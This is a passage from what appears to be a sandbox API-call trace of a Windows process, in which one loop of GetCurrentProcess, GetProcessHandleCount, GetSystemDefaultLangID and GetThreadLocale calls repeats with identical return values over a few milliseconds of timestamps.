GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.062] GetSystemDefaultLangID () returned 0x24d0409 [0076.062] GetThreadLocale () returned 0x409 [0076.062] GetCurrentProcess () returned 0xffffffff [0076.062] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.062] GetSystemDefaultLangID () returned 0x24d0409 [0076.062] GetThreadLocale () returned 0x409 [0076.062] GetCurrentProcess () returned 0xffffffff [0076.062] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.062] GetSystemDefaultLangID () returned 0x24d0409 [0076.062] GetThreadLocale () returned 0x409 [0076.062] GetCurrentProcess () returned 0xffffffff [0076.062] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.062] GetSystemDefaultLangID () returned 0x24d0409 [0076.062] GetThreadLocale () returned 0x409 [0076.062] GetCurrentProcess () returned 0xffffffff [0076.062] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.062] GetSystemDefaultLangID () returned 0x24d0409 [0076.062] GetThreadLocale () returned 0x409 [0076.063] GetCurrentProcess () returned 0xffffffff [0076.063] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.063] GetSystemDefaultLangID () returned 0x24d0409 [0076.063] GetThreadLocale () returned 0x409 [0076.063] GetCurrentProcess () returned 0xffffffff [0076.063] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.063] GetSystemDefaultLangID () returned 0x24d0409 [0076.063] GetThreadLocale () returned 0x409 [0076.063] GetCurrentProcess () returned 0xffffffff [0076.063] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.063] GetSystemDefaultLangID () returned 0x24d0409 [0076.063] GetThreadLocale () returned 0x409 [0076.063] GetCurrentProcess () returned 0xffffffff [0076.063] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.063] GetSystemDefaultLangID () returned 0x24d0409 [0076.063] GetThreadLocale () returned 0x409 [0076.063] GetCurrentProcess () returned 0xffffffff [0076.063] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.063] GetSystemDefaultLangID () returned 0x24d0409 [0076.063] GetThreadLocale () returned 0x409 [0076.063] GetCurrentProcess () returned 0xffffffff [0076.063] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.063] GetSystemDefaultLangID () returned 0x24d0409 [0076.063] GetThreadLocale () returned 0x409 [0076.063] GetCurrentProcess () returned 0xffffffff [0076.063] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.063] GetSystemDefaultLangID () returned 0x24d0409 [0076.063] GetThreadLocale () returned 0x409 [0076.063] GetCurrentProcess () returned 0xffffffff [0076.063] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.063] GetSystemDefaultLangID () returned 0x24d0409 [0076.063] GetThreadLocale () returned 0x409 [0076.063] GetCurrentProcess () returned 0xffffffff [0076.064] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.064] GetSystemDefaultLangID () returned 0x24d0409 [0076.064] GetThreadLocale () returned 0x409 [0076.064] GetCurrentProcess () returned 0xffffffff [0076.064] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.064] GetSystemDefaultLangID () returned 0x24d0409 [0076.064] GetThreadLocale () returned 0x409 [0076.064] GetCurrentProcess () returned 0xffffffff [0076.064] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.064] GetSystemDefaultLangID () returned 0x24d0409 [0076.064] GetThreadLocale () returned 0x409 [0076.064] GetCurrentProcess () returned 0xffffffff [0076.064] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.064] GetSystemDefaultLangID () returned 0x24d0409 [0076.064] GetThreadLocale () returned 0x409 [0076.064] GetCurrentProcess () returned 0xffffffff [0076.064] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.064] GetSystemDefaultLangID () returned 0x24d0409 [0076.064] GetThreadLocale () returned 0x409 [0076.064] GetCurrentProcess () returned 0xffffffff [0076.064] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.064] GetSystemDefaultLangID () returned 0x24d0409 [0076.064] GetThreadLocale () returned 0x409 [0076.064] GetCurrentProcess () returned 0xffffffff [0076.064] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.064] GetSystemDefaultLangID () returned 0x24d0409 [0076.064] GetThreadLocale () returned 0x409 [0076.064] GetCurrentProcess () returned 0xffffffff [0076.064] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.064] GetSystemDefaultLangID () returned 0x24d0409 [0076.064] GetThreadLocale () returned 0x409 [0076.064] GetCurrentProcess () returned 0xffffffff [0076.064] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.064] GetSystemDefaultLangID () returned 0x24d0409 [0076.065] GetThreadLocale () returned 0x409 [0076.065] GetCurrentProcess () returned 0xffffffff [0076.065] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.065] GetSystemDefaultLangID () returned 0x24d0409 [0076.065] GetThreadLocale () returned 0x409 [0076.065] GetCurrentProcess () returned 0xffffffff [0076.065] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.065] GetSystemDefaultLangID () returned 0x24d0409 [0076.065] GetThreadLocale () returned 0x409 [0076.065] GetCurrentProcess () returned 0xffffffff [0076.065] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.065] GetSystemDefaultLangID () returned 0x24d0409 [0076.065] GetThreadLocale () returned 0x409 [0076.065] GetCurrentProcess () returned 0xffffffff [0076.065] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.065] GetSystemDefaultLangID () returned 0x24d0409 [0076.065] GetThreadLocale () returned 0x409 [0076.065] GetCurrentProcess () returned 0xffffffff [0076.065] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.065] GetSystemDefaultLangID () returned 0x24d0409 [0076.065] GetThreadLocale () returned 0x409 [0076.065] GetCurrentProcess () returned 0xffffffff [0076.065] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.065] GetSystemDefaultLangID () returned 0x24d0409 [0076.065] GetThreadLocale () returned 0x409 [0076.065] GetCurrentProcess () returned 0xffffffff [0076.065] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.065] GetSystemDefaultLangID () returned 0x24d0409 [0076.065] GetThreadLocale () returned 0x409 [0076.065] GetCurrentProcess () returned 0xffffffff [0076.065] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.065] GetSystemDefaultLangID () returned 0x24d0409 [0076.065] GetThreadLocale () returned 0x409 [0076.065] GetCurrentProcess () returned 0xffffffff [0076.065] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.066] GetSystemDefaultLangID () returned 0x24d0409 [0076.066] GetThreadLocale () returned 0x409 [0076.066] GetCurrentProcess () returned 0xffffffff [0076.066] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.066] GetSystemDefaultLangID () returned 0x24d0409 [0076.066] GetThreadLocale () returned 0x409 [0076.066] GetCurrentProcess () returned 0xffffffff [0076.066] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.066] GetSystemDefaultLangID () returned 0x24d0409 [0076.066] GetThreadLocale () returned 0x409 [0076.066] GetCurrentProcess () returned 0xffffffff [0076.066] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.066] GetSystemDefaultLangID () returned 0x24d0409 [0076.066] GetThreadLocale () returned 0x409 [0076.066] GetCurrentProcess () returned 0xffffffff [0076.066] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.066] GetSystemDefaultLangID () returned 0x24d0409 [0076.066] GetThreadLocale () returned 0x409 [0076.066] GetCurrentProcess () returned 0xffffffff [0076.066] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.066] GetSystemDefaultLangID () returned 0x24d0409 [0076.066] GetThreadLocale () returned 0x409 [0076.066] GetCurrentProcess () returned 0xffffffff [0076.066] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.066] GetSystemDefaultLangID () returned 0x24d0409 [0076.066] GetThreadLocale () returned 0x409 [0076.066] GetCurrentProcess () returned 0xffffffff [0076.066] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.066] GetSystemDefaultLangID () returned 0x24d0409 [0076.066] GetThreadLocale () returned 0x409 [0076.066] GetCurrentProcess () returned 0xffffffff [0076.066] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.066] GetSystemDefaultLangID () returned 0x24d0409 [0076.067] GetThreadLocale () returned 0x409 [0076.067] GetCurrentProcess () returned 0xffffffff [0076.067] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.067] GetSystemDefaultLangID () returned 0x24d0409 [0076.067] GetThreadLocale () returned 0x409 [0076.067] GetCurrentProcess () returned 0xffffffff [0076.067] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.067] GetSystemDefaultLangID () returned 0x24d0409 [0076.067] GetThreadLocale () returned 0x409 [0076.067] GetCurrentProcess () returned 0xffffffff [0076.067] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.067] GetSystemDefaultLangID () returned 0x24d0409 [0076.067] GetThreadLocale () returned 0x409 [0076.067] GetCurrentProcess () returned 0xffffffff [0076.067] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.067] GetSystemDefaultLangID () returned 0x24d0409 [0076.067] GetThreadLocale () returned 0x409 [0076.067] GetCurrentProcess () returned 0xffffffff [0076.067] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.067] GetSystemDefaultLangID () returned 0x24d0409 [0076.067] GetThreadLocale () returned 0x409 [0076.067] GetCurrentProcess () returned 0xffffffff [0076.067] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.067] GetSystemDefaultLangID () returned 0x24d0409 [0076.067] GetThreadLocale () returned 0x409 [0076.067] GetCurrentProcess () returned 0xffffffff [0076.067] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.067] GetSystemDefaultLangID () returned 0x24d0409 [0076.067] GetThreadLocale () returned 0x409 [0076.070] GetCurrentProcess () returned 0xffffffff [0076.070] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.070] GetSystemDefaultLangID () returned 0x24d0409 [0076.070] GetThreadLocale () returned 0x409 [0076.070] GetCurrentProcess () returned 0xffffffff [0076.071] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.071] GetSystemDefaultLangID () returned 0x24d0409 [0076.071] GetThreadLocale () returned 0x409 [0076.071] GetCurrentProcess () returned 0xffffffff [0076.071] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.071] GetSystemDefaultLangID () returned 0x24d0409 [0076.071] GetThreadLocale () returned 0x409 [0076.071] GetCurrentProcess () returned 0xffffffff [0076.071] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.071] GetSystemDefaultLangID () returned 0x24d0409 [0076.071] GetThreadLocale () returned 0x409 [0076.071] GetCurrentProcess () returned 0xffffffff [0076.071] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.071] GetSystemDefaultLangID () returned 0x24d0409 [0076.071] GetThreadLocale () returned 0x409 [0076.071] GetCurrentProcess () returned 0xffffffff [0076.071] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.071] GetSystemDefaultLangID () returned 0x24d0409 [0076.071] GetThreadLocale () returned 0x409 [0076.071] GetCurrentProcess () returned 0xffffffff [0076.071] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.071] GetSystemDefaultLangID () returned 0x24d0409 [0076.071] GetThreadLocale () returned 0x409 [0076.071] GetCurrentProcess () returned 0xffffffff [0076.071] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.071] GetSystemDefaultLangID () returned 0x24d0409 [0076.072] GetThreadLocale () returned 0x409 [0076.072] GetCurrentProcess () returned 0xffffffff [0076.072] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.072] GetSystemDefaultLangID () returned 0x24d0409 [0076.072] GetThreadLocale () returned 0x409 [0076.072] GetCurrentProcess () returned 0xffffffff [0076.072] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.072] GetSystemDefaultLangID () returned 0x24d0409 [0076.072] GetThreadLocale () returned 0x409 [0076.072] GetCurrentProcess () returned 0xffffffff [0076.072] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.072] GetSystemDefaultLangID () returned 0x24d0409 [0076.072] GetThreadLocale () returned 0x409 [0076.072] GetCurrentProcess () returned 0xffffffff [0076.072] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.072] GetSystemDefaultLangID () returned 0x24d0409 [0076.072] GetThreadLocale () returned 0x409 [0076.072] GetCurrentProcess () returned 0xffffffff [0076.072] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.072] GetSystemDefaultLangID () returned 0x24d0409 [0076.072] GetThreadLocale () returned 0x409 [0076.072] GetCurrentProcess () returned 0xffffffff [0076.072] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.072] GetSystemDefaultLangID () returned 0x24d0409 [0076.072] GetThreadLocale () returned 0x409 [0076.072] GetCurrentProcess () returned 0xffffffff [0076.072] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.072] GetSystemDefaultLangID () returned 0x24d0409 [0076.072] GetThreadLocale () returned 0x409 [0076.073] GetCurrentProcess () returned 0xffffffff [0076.073] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.073] GetSystemDefaultLangID () returned 0x24d0409 [0076.073] GetThreadLocale () returned 0x409 [0076.073] GetCurrentProcess () returned 0xffffffff [0076.073] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.073] GetSystemDefaultLangID () returned 0x24d0409 [0076.073] GetThreadLocale () returned 0x409 [0076.073] GetCurrentProcess () returned 0xffffffff [0076.073] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.073] GetSystemDefaultLangID () returned 0x24d0409 [0076.073] GetThreadLocale () returned 0x409 [0076.073] GetCurrentProcess () returned 0xffffffff [0076.073] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.073] GetSystemDefaultLangID () returned 0x24d0409 [0076.073] GetThreadLocale () returned 0x409 [0076.073] GetCurrentProcess () returned 0xffffffff [0076.073] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.073] GetSystemDefaultLangID () returned 0x24d0409 [0076.073] GetThreadLocale () returned 0x409 [0076.073] GetCurrentProcess () returned 0xffffffff [0076.073] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.073] GetSystemDefaultLangID () returned 0x24d0409 [0076.073] GetThreadLocale () returned 0x409 [0076.073] GetCurrentProcess () returned 0xffffffff [0076.073] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.073] GetSystemDefaultLangID () returned 0x24d0409 [0076.073] GetThreadLocale () returned 0x409 [0076.073] GetCurrentProcess () returned 0xffffffff [0076.074] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.074] GetSystemDefaultLangID () returned 0x24d0409 [0076.074] GetThreadLocale () returned 0x409 [0076.074] GetCurrentProcess () returned 0xffffffff [0076.074] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.074] GetSystemDefaultLangID () returned 0x24d0409 [0076.074] GetThreadLocale () returned 0x409 [0076.074] GetCurrentProcess () returned 0xffffffff [0076.074] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.074] GetSystemDefaultLangID () returned 0x24d0409 [0076.074] GetThreadLocale () returned 0x409 [0076.074] GetCurrentProcess () returned 0xffffffff [0076.074] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.074] GetSystemDefaultLangID () returned 0x24d0409 [0076.074] GetThreadLocale () returned 0x409 [0076.074] GetCurrentProcess () returned 0xffffffff [0076.074] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.074] GetSystemDefaultLangID () returned 0x24d0409 [0076.074] GetThreadLocale () returned 0x409 [0076.074] GetCurrentProcess () returned 0xffffffff [0076.074] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.074] GetSystemDefaultLangID () returned 0x24d0409 [0076.074] GetThreadLocale () returned 0x409 [0076.074] GetCurrentProcess () returned 0xffffffff [0076.074] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.074] GetSystemDefaultLangID () returned 0x24d0409 [0076.074] GetThreadLocale () returned 0x409 [0076.075] GetCurrentProcess () returned 0xffffffff [0076.075] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.075] GetSystemDefaultLangID () returned 0x24d0409 [0076.075] GetThreadLocale () returned 0x409 [0076.075] GetCurrentProcess () returned 0xffffffff [0076.075] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.075] GetSystemDefaultLangID () returned 0x24d0409 [0076.075] GetThreadLocale () returned 0x409 [0076.075] GetCurrentProcess () returned 0xffffffff [0076.075] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.075] GetSystemDefaultLangID () returned 0x24d0409 [0076.075] GetThreadLocale () returned 0x409 [0076.075] GetCurrentProcess () returned 0xffffffff [0076.075] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.075] GetSystemDefaultLangID () returned 0x24d0409 [0076.075] GetThreadLocale () returned 0x409 [0076.075] GetCurrentProcess () returned 0xffffffff [0076.075] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.075] GetSystemDefaultLangID () returned 0x24d0409 [0076.075] GetThreadLocale () returned 0x409 [0076.075] GetCurrentProcess () returned 0xffffffff [0076.075] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.075] GetSystemDefaultLangID () returned 0x24d0409 [0076.075] GetThreadLocale () returned 0x409 [0076.075] GetCurrentProcess () returned 0xffffffff [0076.075] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.075] GetSystemDefaultLangID () returned 0x24d0409 [0076.075] GetThreadLocale () returned 0x409 [0076.075] GetCurrentProcess () returned 0xffffffff [0076.076] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.076] GetSystemDefaultLangID () returned 0x24d0409 [0076.076] GetThreadLocale () returned 0x409 [0076.076] GetCurrentProcess () returned 0xffffffff [0076.076] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.076] GetSystemDefaultLangID () returned 0x24d0409 [0076.076] GetThreadLocale () returned 0x409 [0076.076] GetCurrentProcess () returned 0xffffffff [0076.076] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.076] GetSystemDefaultLangID () returned 0x24d0409 [0076.076] GetThreadLocale () returned 0x409 [0076.076] GetCurrentProcess () returned 0xffffffff [0076.076] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.076] GetSystemDefaultLangID () returned 0x24d0409 [0076.076] GetThreadLocale () returned 0x409 [0076.076] GetCurrentProcess () returned 0xffffffff [0076.076] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.076] GetSystemDefaultLangID () returned 0x24d0409 [0076.076] GetThreadLocale () returned 0x409 [0076.076] GetCurrentProcess () returned 0xffffffff [0076.076] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.076] GetSystemDefaultLangID () returned 0x24d0409 [0076.076] GetThreadLocale () returned 0x409 [0076.076] GetCurrentProcess () returned 0xffffffff [0076.076] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.076] GetSystemDefaultLangID () returned 0x24d0409 [0076.076] GetThreadLocale () returned 0x409 [0076.076] GetCurrentProcess () returned 0xffffffff [0076.076] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.077] GetSystemDefaultLangID () returned 0x24d0409 [0076.077] GetThreadLocale () returned 0x409 [0076.077] GetCurrentProcess () returned 0xffffffff [0076.077] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.077] GetSystemDefaultLangID () returned 0x24d0409 [0076.077] GetThreadLocale () returned 0x409 [0076.077] GetCurrentProcess () returned 0xffffffff [0076.077] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.077] GetSystemDefaultLangID () returned 0x24d0409 [0076.077] GetThreadLocale () returned 0x409 [0076.077] GetCurrentProcess () returned 0xffffffff [0076.077] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.077] GetSystemDefaultLangID () returned 0x24d0409 [0076.077] GetThreadLocale () returned 0x409 [0076.077] GetCurrentProcess () returned 0xffffffff [0076.077] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.077] GetSystemDefaultLangID () returned 0x24d0409 [0076.077] GetThreadLocale () returned 0x409 [0076.077] GetCurrentProcess () returned 0xffffffff [0076.077] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.077] GetSystemDefaultLangID () returned 0x24d0409 [0076.077] GetThreadLocale () returned 0x409 [0076.077] GetCurrentProcess () returned 0xffffffff [0076.077] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.077] GetSystemDefaultLangID () returned 0x24d0409 [0076.077] GetThreadLocale () returned 0x409 [0076.077] GetCurrentProcess () returned 0xffffffff [0076.077] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.077] GetSystemDefaultLangID () returned 0x24d0409 [0076.078] GetThreadLocale () returned 0x409 [0076.078] GetCurrentProcess () returned 0xffffffff [0076.078] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.078] GetSystemDefaultLangID () returned 0x24d0409 [0076.078] GetThreadLocale () returned 0x409 [0076.078] GetCurrentProcess () returned 0xffffffff [0076.078] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.078] GetSystemDefaultLangID () returned 0x24d0409 [0076.078] GetThreadLocale () returned 0x409 [0076.078] GetCurrentProcess () returned 0xffffffff [0076.078] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.078] GetSystemDefaultLangID () returned 0x24d0409 [0076.078] GetThreadLocale () returned 0x409 [0076.078] GetCurrentProcess () returned 0xffffffff [0076.078] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.078] GetSystemDefaultLangID () returned 0x24d0409 [0076.078] GetThreadLocale () returned 0x409 [0076.078] GetCurrentProcess () returned 0xffffffff [0076.078] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.078] GetSystemDefaultLangID () returned 0x24d0409 [0076.078] GetThreadLocale () returned 0x409 [0076.078] GetCurrentProcess () returned 0xffffffff [0076.078] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.078] GetSystemDefaultLangID () returned 0x24d0409 [0076.078] GetThreadLocale () returned 0x409 [0076.078] GetCurrentProcess () returned 0xffffffff [0076.078] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.079] GetSystemDefaultLangID () returned 0x24d0409 [0076.079] GetThreadLocale () returned 0x409 [0076.079] GetCurrentProcess () returned 0xffffffff [0076.079] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.079] GetSystemDefaultLangID () returned 0x24d0409 [0076.079] GetThreadLocale () returned 0x409 [0076.079] GetCurrentProcess () returned 0xffffffff [0076.079] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.079] GetSystemDefaultLangID () returned 0x24d0409 [0076.079] GetThreadLocale () returned 0x409 [0076.079] GetCurrentProcess () returned 0xffffffff [0076.079] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.079] GetSystemDefaultLangID () returned 0x24d0409 [0076.079] GetThreadLocale () returned 0x409 [0076.079] GetCurrentProcess () returned 0xffffffff [0076.079] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.079] GetSystemDefaultLangID () returned 0x24d0409 [0076.079] GetThreadLocale () returned 0x409 [0076.079] GetCurrentProcess () returned 0xffffffff [0076.079] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0076.079] GetSystemDefaultLangID () returned 0x24d0409 [0076.079] 